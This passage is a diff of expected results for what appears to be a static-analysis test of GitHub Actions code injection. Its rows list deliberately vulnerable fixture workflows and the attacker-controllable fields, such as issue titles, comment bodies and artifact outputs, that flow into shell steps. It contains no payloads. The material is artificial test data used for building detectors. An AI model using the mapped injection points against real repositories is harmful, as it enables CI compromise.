| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | .github/workflows/test.yml | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout1.yml | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches3.yml | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches5.yml | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in 